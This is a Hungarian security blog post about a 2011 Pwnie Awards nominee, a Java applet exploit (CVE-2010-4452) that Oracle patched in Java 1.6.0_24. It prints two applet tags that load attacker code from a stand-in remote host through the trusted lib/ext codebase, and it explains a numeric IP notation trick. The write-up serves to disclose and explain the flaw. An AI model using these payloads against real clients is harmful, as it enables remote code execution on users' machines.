Tweets by @buherablog
profile for buherator at IT Security Stack Exchange, Q&A for IT security professionals

A BitBetyár Blog

Túljártál a nagyokosok eszén? Küldd be a mutatványodat! (e-mail a buherator gmailkomra jöhet)

Full-Disclosure / Névjegy / Coming out


Promó

H.A.C.K.

Címkék

0day (110) adobe (87) adobe reader (21) anonymous (26) apple (60) az olvasó ír (49) blackhat (20) botnet (22) bug (200) buherablog (44) buhera sörözés (39) bukta (49) deface (38) dns (22) dos (29) esemény (82) facebook (26) firefox (64) flash (33) gondolat (31) google (59) google chrome (36) hacktivity (37) hírek (117) incidens (224) internet explorer (88) iphone (35) java (50) jog (22) kína (21) kriptográfia (68) kultúra (21) linux (24) malware (43) microsoft (142) móka (48) mozilla (23) office (26) oracle (40) os x (43) patch (197) php (20) politika (31) privacy (58) programozás (22) safari (34) sql injection (62) windows (85) xss (77) Címkefelhő

Licensz

Creative Commons Licenc

Pwnie Awards 2011 - CVE-2010-4452

2011.07.25. 14:58 | buherator | 2 komment

Lezárult az idei Pwnie Awards nevezési időszaka, a hivatalos weboldalon megtekinthetők a jelölések. Az idei mezőny igen erős, és bár a szervezők kommentjei önmagukban is megérnek egy misét, érdemes végignézni a jelölteket részletesebben is. Néhányukról már volt szó, az elkövetkező napokban-hetekben igyekezni fogok írni azokról a szebb darabokról is, melyek eddig kimaradtak a szórásból.

Elsőként vegyük Frédéric Hoguin Java exploitját, ami pusztán a Java beépített lehetőségeit kihasználva ad kódfuttatásra lehetőséget aláíratlan Java appleteken keresztül:

A probléma gyökere az, hogy az <applet> tagek code attributumában a betöltendő osztály nevét meghatározó karakterláncban megadható egy teljes URL is, a futtatókörnyezet azonban a codebase attributumban megadott URL biztonsági paramétereivel futtatja le azt. Mivel a Java appletek alapértelmezetten egy elég kevés lehetőséget adó homokozóban futnak, kell találni egy olyan kódbázist, ami mindig megbízható a JRE számára. Szerencsére a Java telepítési könyvtárában a lib/ext útvonal pontosan egy ilyen megbízható kódbázist jelöl, így a 

<applet codebase=”file:C:\Program Files\Java\jre6\lib\ext” code=”http://attacker/AttackerCode” /> 

Taggel megadott applet bármit megtehet a kliens számítógéppel a Java-t futtató felhasználó jogkörében. A baj csak az, hogy a code attributumban minden . karakter /-re alakítódik, így több szintű domain nevek illetve IP címek esetén bajban leszünk. Még szerencse, hogy a JRE elfogadja az IP címeket ún. numerikus notációban is: ekkor az IP cím byte-jait egy egyész számmá összefűzve értelmezzük, így például a 192.168.0.1 címből a 3232235521 szám lesz. Ezt megadva hosztként tetszőleges címről betölthetünk Java osztályokat, melyek aztán hozzáférhetnek a fájlrendszerhez, folyamatokat indíthatnak, nyers hálózati kapcsolatokat nyithatnak, stb.:

<applet codebase=”file:C:\Program Files\Java\jre6\lib\ext” code=”http://3232235521/AttackerCode” />

Az Oracle a Java 1.6.0_24 kiadásával javította a problémát idén februárban.

Címkék: java pwnie awards

Kommentek:

A hozzászólások a vonatkozó jogszabályok  értelmében felhasználói tartalomnak minősülnek, értük a szolgáltatás technikai  üzemeltetője semmilyen felelősséget nem vállal, azokat nem ellenőrzi. Kifogás esetén forduljon a blog szerkesztőjéhez. Részletek a  Felhasználási feltételekben és az adatvédelmi tájékoztatóban.

Tyra3l 2011.07.25. 16:40:07

kosz a cikket, aprobb hiba:
"kihasználva az kódfuttatásra lehetőséget"
helyett
"kihasználva ad kódfuttatásra lehetőséget"
kellene szerepeljen gondolom.

Tyrael
süti beállítások módosítása